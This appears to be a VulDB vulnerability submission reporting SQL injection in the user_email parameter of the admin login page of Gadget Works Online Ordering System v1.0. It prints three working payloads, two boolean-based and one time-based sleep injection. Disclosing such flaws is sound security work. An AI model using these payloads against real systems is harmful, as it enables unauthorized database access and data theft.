Submit #100621: Gadget Works Online Ordering System v1.0 /philosophy/admin/login.php post parameter user_email exists SQL injection vulnerability
| Title | Gadget Works Online Ordering System v1.0 /philosophy/admin/login.php post parameter user_email exists SQL injection vulnerability |
|---|---|
| Description | An issue was discovered in Gadget Works Online Ordering System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /philosophy/admin/login.php post parameter user_email. Payload1:user_email=a' rlike (select (case when (666=666) then 0x61 else 0x28 end))-- b&user_pass=b&btnLogin= Payload2:user_email=a' rlike (select (case when (666=555) then 0x61 else 0x28 end))-- b&user_pass=b&btnLogin= Payload3:user_email=a' and (select 1 from (select(sleep(20)))a)-- a&user_pass=b&btnLogin= |
| Source | ⚠️ https:/ |
| User | heitaoa999 (ID 42741) |
| Submission | 03/12/2023 05:12 (1 Year ago) |
| Moderation | 03/12/2023 08:13 (3 hours later) |
| Accepted | Accepted |
| VulDB Entry | VDB-222861 |